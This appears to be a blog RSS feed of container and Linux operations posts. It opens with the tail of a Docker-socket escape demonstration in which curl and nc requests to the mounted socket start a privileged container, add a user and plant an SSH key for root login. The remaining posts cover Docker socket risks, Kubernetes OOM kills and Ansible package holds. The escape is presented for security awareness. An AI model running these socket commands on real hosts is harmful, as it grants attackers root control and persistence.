Docker-Experimental: &lt;span class="nb"&gt;false
&lt;/span&gt;Ostype: linux
Server: Docker/27.3.1 &lt;span class="o"&gt;(&lt;/span&gt;linux&lt;span class="o"&gt;)&lt;/span&gt;
Date: Sat, 28 Sep 2024 15:18:51 GMT
Content-Length: 88

&lt;span class="o"&gt;{&lt;/span&gt;&lt;span class="s2"&gt;"Id"&lt;/span&gt;:&lt;span class="s2"&gt;"0f9e8ac0c044a6e885dbb41dfeec772097ef223dc97664dcc777a5b4da581791"&lt;/span&gt;,&lt;span class="s2"&gt;"Warnings"&lt;/span&gt;:[]&lt;span class="o"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;To break down what is done here: First, the content length of the request is calculated. You could also manually do this in a prior step, but letting &lt;code&gt;wc&lt;/code&gt; do the work is easier. Then we just print this request and pipe it into 'nc'.&lt;/p&gt;

&lt;p&gt;We just use the same container image that Traefik uses as it's already on the system, so this would be possible in an air-gapped environment without downloading additional containers. The container will run in privileged mode and have the host's root filesystem mounted, as well as &lt;code&gt;/dev&lt;/code&gt;. &lt;code&gt;nsenter&lt;/code&gt; is used to enter the host's namespace and execute commands from there. That's why privileged is necessary here.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;~ &lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="s2"&gt;"POST /containers/0f9e8ac0c044a6e885dbb41dfeec772097ef223dc97664dcc777a5b4da581791/start HTTP/1.1&lt;/span&gt;&lt;span class="se"&gt;\r\n&lt;/span&gt;&lt;span class="s2"&gt;Host: localhost:2375&lt;/span&gt;&lt;span class="se"&gt;\r\n&lt;/span&gt;&lt;span class="s2"&gt;Content-Type: application/js
on&lt;/span&gt;&lt;span class="se"&gt;\r\n&lt;/span&gt;&lt;span class="s2"&gt;Connection: close&lt;/span&gt;&lt;span class="se"&gt;\r\n\r\n&lt;/span&gt;&lt;span class="s2"&gt;{}"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nb"&gt;sleep &lt;/span&gt;1&lt;span class="o"&gt;)&lt;/span&gt; | nc &lt;span class="nb"&gt;local&lt;/span&gt;:/var/run/docker.sock
HTTP/1.1 204 No Content
Api-Version: 1.47
Docker-Experimental: &lt;span class="nb"&gt;false
&lt;/span&gt;Ostype: linux
Server: Docker/27.3.1 &lt;span class="o"&gt;(&lt;/span&gt;linux&lt;span class="o"&gt;)&lt;/span&gt;
Date: Sat, 28 Sep 2024 15:19:24 GMT
Connection: close
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The second requests just starts the container. &lt;code&gt;sleep 1&lt;/code&gt; is used to allow enough time for the request to complete. A simple user is created as proof that the access works:&lt;/p&gt;

&lt;p&gt;The fully API reference is available in &lt;a href="https://docs.docker.com/reference/api/engine/version/v1.47/" rel="noopener noreferrer"&gt;Docker's documentation&lt;/a&gt;, for a list of possible requests.&lt;/p&gt;

&lt;p&gt;To demonstrate that our access is successful, let’s check the &lt;code&gt;/etc/passwd&lt;/code&gt; file on the host:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;david@debian:~&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;cat&lt;/span&gt; /etc/passwd
root:x:0:0:root:/root:/bin/bash
...
hacked:x:1002:1002::/home/hacked:/bin/sh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;As you can see, we’ve successfully created a new user named hacked. From this point, we can escalate our access further. For instance, we could add an SSH public key to allow SSH access as root:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;~ &lt;span class="nv"&gt;$ &lt;/span&gt;curl &lt;span class="nt"&gt;-s&lt;/span&gt; &lt;span class="nt"&gt;-X&lt;/span&gt; POST &lt;span class="nt"&gt;--unix-socket&lt;/span&gt; /var/run/docker.sock &lt;span class="se"&gt;\&lt;/span&gt;
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;   &lt;span class="nt"&gt;-H&lt;/span&gt; &lt;span class="s2"&gt;"Content-Type: application/json"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;   &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="s1"&gt;'{
&amp;gt;     "Image": "traefik@sha256:6215528042906b25f23fcf51cc5bdda29e078c6e84c237d4f59c00370cb68440",
&amp;gt;     "Cmd": ["sh", "-c", "mkdir -p /host/root/.ssh; umask 0266; echo ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPdqdYmQgtmYArjAtFz00y69k1rUAeS6CvjAj2LWeOf6 &amp;gt;&amp;gt; /host/root/.
ssh/authorized_keys"],
&amp;gt;     "HostConfig": {
&amp;gt;       "Privileged": true,
&amp;gt;       "NetworkMode": "host",
&amp;gt;       "Binds": ["/:/host"]
&amp;gt;     }
&amp;gt;   }'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;   http://localhost/containers/create
&lt;span class="o"&gt;{&lt;/span&gt;&lt;span class="s2"&gt;"Id"&lt;/span&gt;:&lt;span class="s2"&gt;"1309d783fc5b66125c61151aa6ef93d235d5e4e07b9bffaaf98389f2441c3d16"&lt;/span&gt;,&lt;span class="s2"&gt;"Warnings"&lt;/span&gt;:[]&lt;span class="o"&gt;}&lt;/span&gt;
~ &lt;span class="nv"&gt;$ &lt;/span&gt;curl &lt;span class="nt"&gt;-X&lt;/span&gt; POST &lt;span class="nt"&gt;-H&lt;/span&gt; &lt;span class="s2"&gt;"Content-Type: application/json"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;   &lt;span class="nt"&gt;--unix-socket&lt;/span&gt; /var/run/docker.sock &lt;span class="se"&gt;\&lt;/span&gt;
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;   http://localhost/containers/1309d783fc5b66125c61151aa6ef93d235d5e4e07b9bffaaf98389f2441c3d16/start
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And just like that, we’ve cracked the door wide open! You can now log in as root without needing a password:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;❯ ssh root@192.168.122.155 &lt;span class="nt"&gt;-i&lt;/span&gt; ./traefik_key
Linux debian 6.1.0-25-amd64 &lt;span class="c"&gt;#1 SMP PREEMPT_DYNAMIC Debian 6.1.106-3 (2024-08-26) x86_64&lt;/span&gt;

The programs included with the Debian GNU/Linux system are free software&lt;span class="p"&gt;;&lt;/span&gt;
the exact distribution terms &lt;span class="k"&gt;for &lt;/span&gt;each program are described &lt;span class="k"&gt;in &lt;/span&gt;the
individual files &lt;span class="k"&gt;in&lt;/span&gt; /usr/share/doc/&lt;span class="k"&gt;*&lt;/span&gt;/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Sep 27 18:00:01 2024 from 192.168.122.1    
root@debian:~# &lt;span class="nb"&gt;ls&lt;/span&gt; &lt;span class="nt"&gt;-l&lt;/span&gt; ./.ssh/authorized_keys 
&lt;span class="nt"&gt;-r--------&lt;/span&gt; 1 root root 162 Sep 28 10:22 ./.ssh/authorized_keys
root@debian:~# &lt;span class="nb"&gt;cat&lt;/span&gt; ./.ssh/authorized_keys 
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPdqdYmQgtmYArjAtFz00y69k1rUAeS6CvjAj2LWeOf6
oot@debian:~# &lt;span class="nb"&gt;whoami
&lt;/span&gt;root
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  &lt;code&gt;hardening:x:100:107::/nonexistent:/usr/sbin/nologin&lt;/code&gt;
&lt;/h2&gt;

&lt;p&gt;This clearly illustrates that even with hardening measures in place, it’s all too easy to exploit a system when a container has access to a mounted Docker socket.&lt;/p&gt;

&lt;p&gt;So, how can you truly secure our system? Stay tuned for my next post, where we’ll dive into the strategies you can implement to protect your systems from these potential pitfalls!&lt;/p&gt;

</description>
      <category>docker</category>
      <category>containers</category>
      <category>cybersecurity</category>
      <category>traefik</category>
    </item>
    <item>
      <title>Opening Pandora's Container - How Exposing the Docker Socket Paves the Way to Host Control (Part 1)</title>
      <dc:creator>David Gries</dc:creator>
      <pubDate>Sun, 22 Sep 2024 18:20:30 +0000</pubDate>
      <link>https://forem.com/dgries/opening-pandoras-container-how-exposing-the-docker-socket-paves-the-way-to-host-control-part-1-1nm4</link>
      <guid>https://forem.com/dgries/opening-pandoras-container-how-exposing-the-docker-socket-paves-the-way-to-host-control-part-1-1nm4</guid>
      <description>&lt;p&gt;In this three-part series, we'll explore some significant risks when working with Docker. The first part focuses on the Docker socket's role, the second will illustrate a real-world scenario of how attackers can compromise the host system, and the final post will provide hardening measures to mitigate these risks.&lt;/p&gt;

&lt;h2&gt;
  
  
  Role of the Docker Socket
&lt;/h2&gt;

&lt;p&gt;If you've ever used Docker, you're likely familiar with its command-line interface (CLI). In simple setups, the CLI acts as the primary tool for interacting with the local Docker daemon - creating, starting, and stopping containers, etc. In more complex configurations, the CLI can also execute commands against remote targets. But how does it communicate with the daemon?&lt;/p&gt;

&lt;p&gt;Docker utilizes a &lt;a href="https://docs.docker.com/reference/api/engine/version/v1.47/" rel="noopener noreferrer"&gt;REST API&lt;/a&gt; for this interaction. By default, this API is not exposed over a TCP socket as you might expect; instead, it uses a Unix Domain Socket. (For a deep dive into inter-process communication with domain sockets, stay tuned for a future post.)&lt;/p&gt;

&lt;p&gt;Let's take a look at the socket file on a default Debian installation:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;admin@proxy:~&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;ls&lt;/span&gt; &lt;span class="nt"&gt;-la&lt;/span&gt; /var/run/docker.sock 
srw-rw---- 1 root docker 0 Sep 20 13:37 /var/run/docker.sock
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;As you can see, the file is writable by both the &lt;code&gt;root&lt;/code&gt; user and &lt;code&gt;docker&lt;/code&gt; group. This means that any member of that group has full access to this endpoint and can access the API.&lt;/p&gt;

&lt;p&gt;For example, to get information about the installed engine without using the CLI you can query the socket using &lt;code&gt;curl&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;root@proxy:~# curl &lt;span class="nt"&gt;--silent&lt;/span&gt; &lt;span class="nt"&gt;--unix-socket&lt;/span&gt; /var/run/docker.sock &lt;span class="s2"&gt;"http://localhost/version"&lt;/span&gt; | python3 &lt;span class="nt"&gt;-m&lt;/span&gt; json.tool
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"Platform"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="nl"&gt;"Name"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"Docker Engine - Community"&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"Components"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
            &lt;/span&gt;&lt;span class="nl"&gt;"Name"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"Engine"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
            &lt;/span&gt;&lt;span class="nl"&gt;"Version"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"27.3.1"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
            &lt;/span&gt;&lt;span class="nl"&gt;"Details"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="err"&gt;...&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;As the &lt;code&gt;docker&lt;/code&gt; CLI is just a tool to interact with the backend, access to the socket provides the same level of (or even more) control over the system as using the CLI does.&lt;/p&gt;

&lt;h2&gt;
  
  
  Reasons for Exposing the Docker Socket
&lt;/h2&gt;

&lt;p&gt;You may wonder why one would even want to expose the Docker socket when there are clearly risks involved. A popular usecase besides accessing remote Docker daemons (which you can actually expose over a TCP socket) are applications that either need control of the daemon to manage other containers, like for example &lt;a href="https://docs.portainer.io/" rel="noopener noreferrer"&gt;Portainer&lt;/a&gt;, or tools that need information about containers for auto discovery purposes, like Traefik. &lt;a href="https://traefik.io/traefik/" rel="noopener noreferrer"&gt;The official Traefik documentation&lt;/a&gt; even includes a mounted docker socket in their deployment example:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;services&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;reverse-proxy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;traefik:v3.1&lt;/span&gt;
    &lt;span class="na"&gt;command&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;--api.insecure=true --providers.docker&lt;/span&gt;
    &lt;span class="na"&gt;ports&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;80:80"&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;8080:8080"&lt;/span&gt;
    &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="c1"&gt;# Socket mounted into container running as 'root'&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;/var/run/docker.sock:/var/run/docker.sock&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Wrapping Up
&lt;/h2&gt;

&lt;p&gt;I've highlighted Traefik because it's a widely used reverse proxy that is frequently exposed directly to the public internet. This means that a vulnerability allowing remote code execution could grant attackers full access not only to the Traefik container, but also to the entire host system, if you don't take the necessary security measures.&lt;/p&gt;

&lt;p&gt;In the upcoming parts, I'll provide a straightforward example demonstrating how an attacker can gain control of the Docker daemon and the host system from within a container. Additionally, I'll share strategies for hardening your systems to limit the impact of these kinds of threats. Stay tuned!&lt;/p&gt;

</description>
      <category>containers</category>
      <category>docker</category>
      <category>security</category>
      <category>linux</category>
    </item>
    <item>
      <title>Escaping the OOM Killer</title>
      <dc:creator>David Gries</dc:creator>
      <pubDate>Sun, 04 Feb 2024 20:11:27 +0000</pubDate>
      <link>https://forem.com/dgries/escaping-the-oom-killer-1ic0</link>
      <guid>https://forem.com/dgries/escaping-the-oom-killer-1ic0</guid>
      <description>&lt;p&gt;Ever wondered why certain Pods face the Kubernetes OOM killer despite ample available resources? Or perhaps encountered applications attempting to exceed configured memory limits, seemingly functioning smoothly on a low-memory VM?&lt;/p&gt;

&lt;h2&gt;
  
  
  Resource Limits in Kubernetes
&lt;/h2&gt;

&lt;p&gt;Containerizing applications has solidified its position as the go-to standard for modern infrastructure. Whether operating in a virtual environment or a bare-metal cluster, understanding the ins and outs of effective resource management is crucial.&lt;/p&gt;

&lt;p&gt;In contrast to CPU limits, which cause a Pod's processes to wait if the CPU time slice limit is reached, reaching a memory limit can be destructive as it causes a process to be killed by the underlying system's out of memory (OOM) killer. This can be seen when a process exits with code &lt;code&gt;137&lt;/code&gt; (&lt;code&gt;SIGKILL&lt;/code&gt;). This means that the process isn't shut down gracefully, which already has to be considered during development.&lt;/p&gt;

&lt;h3&gt;
  
  
  Problem 1: Cgroup Awareness
&lt;/h3&gt;

&lt;p&gt;Compared to containerless environments, Kubernetes' reliance on cgroups for constraining system resources reveals some subtle challenges that may not be immediately apparent.&lt;/p&gt;

&lt;p&gt;Let's dive into the highlighted issue. Consider the following scenario executed within a Pod with a memory limit set to 4GiB:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="nn"&gt;...&lt;/span&gt;
&lt;span class="na"&gt;resources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;limits&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;cpu&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;1"&lt;/span&gt;
    &lt;span class="na"&gt;memory&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;4Gi&lt;/span&gt;
  &lt;span class="na"&gt;requests&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;cpu&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;50m&lt;/span&gt;
    &lt;span class="na"&gt;memory&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;64Mi&lt;/span&gt;
&lt;span class="nn"&gt;...&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;When inspecting &lt;code&gt;/proc/meminfo&lt;/code&gt;, the output reveals varying available resources:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;bash-5.1&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;cat&lt;/span&gt; /proc/meminfo
MemTotal:        8124016 kB
MemFree:          346844 kB
MemAvailable:    3358232 kB
Buffers:          999768 kB
Cached:          1690344 kB
...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This discrepancy arises because not all content in &lt;code&gt;/proc&lt;/code&gt; is namespace-aware. The metrics shown are actually those of the Node the Pod is scheduled on. Tools like &lt;code&gt;free&lt;/code&gt; for example, which pre-date cgroups, utilize this resource to collect memory metrics.&lt;/p&gt;

&lt;p&gt;So, what's the solution? While there aren't direct replacements providing the same metric namespace-aware, there are methods to obtain similar metrics from within the container. A straightforward approach involves examining files under &lt;code&gt;/sys/fs/cgroup/memory/&lt;/code&gt;. In the example above, this yields:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;bash-5.1&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;cat&lt;/span&gt; /sys/fs/cgroup/memory/memory.limit_in_bytes
4294967296
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This value precisely matches the configured 4GiB limit. It's vital to consider that when developing applications meant to run in a containerized environment.&lt;/p&gt;

&lt;h3&gt;
  
  
  Problem 2: Page Cache
&lt;/h3&gt;

&lt;p&gt;Yet another not obvious issue arises when dealing with Linux's page cache, as it contributes to the &lt;code&gt;memory.available&lt;/code&gt; metric. This leads to cAdvisor including the page cache in the calculated used memory, creating unnecessary memory pressure on the Kubelet. This poses a challenge, given that the page cache should represent evictable memory: In scenarios where multiple applications heavily rely on cache, the Node experiences heightened memory pressure, leading to the eviction of Pods.&lt;/p&gt;

&lt;p&gt;The issue can be easily mitigated by aligning memory limits with requests. This strategy guarantees sufficient memory availability for all Pods scheduled on the Node. However, it remains more of a workaround than a resolution, as the underlying problem persists — Kubelet does not evict caches; instead, it evicts the entire Pod.&lt;/p&gt;

&lt;p&gt;Node-pressure eviction is especially bad because configurations like &lt;code&gt;PodDisruptionBudget&lt;/code&gt; and &lt;code&gt;terminationGracePeriodSeconds&lt;/code&gt; are not considered in this scenario!&lt;/p&gt;

&lt;p&gt;Given the intricacies of this subject, the provided information just offers a high-level overview. For a more in-depth understanding, consider exploring the details presented in &lt;a href="https://github.com/kubernetes/kubernetes/issues/43916" rel="noopener noreferrer"&gt;this GitHub issue&lt;/a&gt;. Notably, &lt;a href="https://github.com/kubernetes/kubernetes/issues/43916#issuecomment-430841267" rel="noopener noreferrer"&gt;this specific comment&lt;/a&gt; contains a concise summary of the matter.&lt;/p&gt;

&lt;h3&gt;
  
  
  Problem 3: Invisible OOM Kills
&lt;/h3&gt;

&lt;p&gt;By default, Kubernetes enforces process separation through namespaces. This ensures that the main process is assigned &lt;code&gt;PID 1&lt;/code&gt;, a crucial identifier in the Linux process hierarchy. It's responsible for the lifecycle of all sub-processes and the only one considered in Kubernetes' monitoring by default. Let's examine this with a quick look at a system using &lt;code&gt;ps&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;root@ubuntu:/# ps &lt;span class="nt"&gt;-aux&lt;/span&gt;
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.0   2796  1408 ?        S&amp;lt;s  18:25   0:00 &lt;span class="nb"&gt;sleep &lt;/span&gt;604800
root          20  0.0  0.0   4636  3840 pts/0    S&amp;lt;s  19:12   0:00 bash
root          41  0.0  0.0   7068  3072 pts/0    R&amp;lt;+  19:13   0:00 ps &lt;span class="nt"&gt;-aux&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In the output, &lt;code&gt;PID 1&lt;/code&gt; corresponds to the main process, showcasing the default isolation within namespaces.&lt;/p&gt;

&lt;p&gt;The OOM Killer selects processes that will free up the maximum amount of memory, factoring in the &lt;code&gt;oom_score&lt;/code&gt; of each process. Therefore the process killed isn't always the main process of a container! Despite the OOM Killer's actions, Kubernetes metrics only reflect the OOM kill when &lt;code&gt;PID 1&lt;/code&gt; is affected. This invisibility could cause a potential mismatch between the container's status and its actual state when not using other sufficient health checks.&lt;/p&gt;

&lt;p&gt;This leads to leaving the process's lifecycle unmanaged by Kubernetes. While that may not pose significant issues if the main process functions as an init system, it becomes problematic when child processes are not handled correctly by the container's init process after termination, leaving the Pod appearing to run without any apparent issues.&lt;/p&gt;

&lt;p&gt;Understanding these details in process isolation and OOM handling is crucial for a predictable and stable environment.&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;In summary, effective management of Kubernetes memory constraints requires some understanding of namespaces and related challenges. Discrepancies in cgroup awareness, issues with Linux's page cache metrics in cAdvisor, and the invisibility of certain OOM kills underscore the need for a nuanced approach.&lt;/p&gt;

&lt;p&gt;Mastering these intricacies is important to maintain a reliable Kubernetes infrastructure, optimizing resource utilization for containerized applications and preventing unexpected disruptions.&lt;/p&gt;

</description>
      <category>kubernetes</category>
      <category>linux</category>
      <category>containers</category>
    </item>
    <item>
      <title>Taking Down Production With Ansible and Aptitude</title>
      <dc:creator>David Gries</dc:creator>
      <pubDate>Sun, 26 Nov 2023 19:49:02 +0000</pubDate>
      <link>https://forem.com/dgries/crashing-production-with-ansible-and-aptitude-3ljm</link>
      <guid>https://forem.com/dgries/crashing-production-with-ansible-and-aptitude-3ljm</guid>
      <description>&lt;h2&gt;
  
  
  The Importance of Consistent Base Systems
&lt;/h2&gt;

&lt;p&gt;Few things are as anxiety-inducing as watching stable production servers become a chaotic mess after a simple update. Yet, this scenario is one that many sysadmins dread. If you're seeking ways to avoid such scenarios, especially while leveraging Ansible in combination with Debian-based systems, read on.&lt;/p&gt;

&lt;h3&gt;
  
  
  📦 Linux Package Management: A Double-Edged Sword
&lt;/h3&gt;

&lt;p&gt;One of the greatest advantages of Linux systems is without a doubt its package management. Most "classic" distributions handle application- and operating system updates using the same package management system. This has many advantages, like applying the latest security patches for the OS and applications by just doing a single update transaction. But this of course has its drawbacks.&lt;/p&gt;

&lt;p&gt;Just think about application updates: For example, databases like PostgreSQL are not always compatible across major releases. This is one of the reasons Long Term Support (LTS) distributions often stick to specific application versions and just provide bug- and security patches during their lifecycle.&lt;/p&gt;

&lt;h3&gt;
  
  
  🗄️ The Issue With Third Party Repositories
&lt;/h3&gt;

&lt;p&gt;Third-Party packages (in the sense of not provided in the distribution's repository) are often used, be it to avoid unwanted changes by package maintainers, installing software versions provided by the application vendor or ones that are simply not available in the default repositories. However, these often follow distinct release cycles from the underlying distro, complicating system update processes.&lt;/p&gt;

&lt;p&gt;This leads to the necessity to mitigate unwanted upgrades when updating the base OS. Different package managers handle this in various ways.&lt;/p&gt;

&lt;h3&gt;
  
  
  📌 Ansible and Pinning Debian Packages
&lt;/h3&gt;

&lt;p&gt;Debian-based systems offer means to prevent package version upgrades. Apart from employing &lt;a href="https://wiki.debian.org/AptConfiguration#apt_preferences_.28APT_pinning.29" rel="noopener noreferrer"&gt;APT Pinning&lt;/a&gt;, sometimes simply adhering to a specific version suffices, accomplished by "holding" packages using &lt;a href="https://manpages.debian.org/bookworm/apt/apt-mark.8.en.html" rel="noopener noreferrer"&gt;apt-mark&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Now to the issue to why inconsistency in systems can make a difference here, using a real-world example (luckily not in production). The Ansible's &lt;a href="https://docs.ansible.com/ansible/latest/collections/ansible/builtin/apt_module.html" rel="noopener noreferrer"&gt;ansible.builtin.apt&lt;/a&gt; module by default uses &lt;a href="https://wiki.debian.org/Aptitude" rel="noopener noreferrer"&gt;Aptitude&lt;/a&gt;, an alternative frontend to the &lt;code&gt;apt&lt;/code&gt; or &lt;code&gt;apt-get&lt;/code&gt; CLI. If not available, it falls back to using said programs. &lt;code&gt;dpkg&lt;/code&gt;, which is also used as the backend for &lt;code&gt;apt-mark&lt;/code&gt;, stores the state of every installed package in the package status database under &lt;code&gt;/var/lib/dpkg/status&lt;/code&gt;. Unfortunately, this data is not taken into account by Aptitude. It uses an own database for its &lt;code&gt;hold&lt;/code&gt; function.&lt;/p&gt;

&lt;p&gt;What's the upshot? Let's say you update all machines using the Apt module for Ansible. The packages you want to handle separately (e.g. the "main" function of the server) are held by DPKG to avoid unwanted upgrades, so you're safe. There's one issue though: one of the systems has Aptitude installed without you knowing. So during the upgrade, Ansible detects Aptitude, adopts it as the default package management tool, and updates all packages, including those retained in DPKG's database. Not an ideal outcome, right?&lt;/p&gt;

&lt;h3&gt;
  
  
  🛡️ How to Safeguard Against This
&lt;/h3&gt;

&lt;p&gt;Several approaches exist to tackle such scenarios, like containerizing applications, creating custom repos, or employing diverse methods to pin packages.  However, if retaining existing infrastructure is the priority, ensuring Aptitude's presence on all systems or utilizing the &lt;code&gt;force_apt_get&lt;/code&gt; flag in the Ansible module can avert inconsistencies between systems.&lt;/p&gt;

&lt;p&gt;Moreover, it's important that you know your infrastructure and ensure that servers with similar functions or managed by one team are set up in a consistent manner.&lt;/p&gt;

&lt;p&gt;❓ How do you handle similar scenarios? Feel free to share your thoughts or critique in the comments!&lt;/p&gt;

</description>
      <category>ansible</category>
      <category>debian</category>
      <category>ubuntu</category>
      <category>automation</category>
    </item>
    <item>
      <title>Building Secure Foundations: A Practical Guide to Minimizing Linux Services' Attack Surface</title>
      <dc:creator>David Gries</dc:creator>
      <pubDate>Sat, 11 Nov 2023 22:47:03 +0000</pubDate>
      <link>https://forem.com/dgries/enhancing-service-security-with-systemd-j2i</link>
      <guid>https://forem.com/dgries/enhancing-service-security-with-systemd-j2i</guid>
      <description>&lt;p&gt;Cybersecurity and its awareness have never been more crucial than they are today. Considering the increasing amount of attacks, it has become clear that protecting digital assets plays a significant role in software development and operations. What concrete steps can be taken to enhance the security of our services even further?&lt;/p&gt;

&lt;h3&gt;
  
  
  Starting at a Lower Level
&lt;/h3&gt;

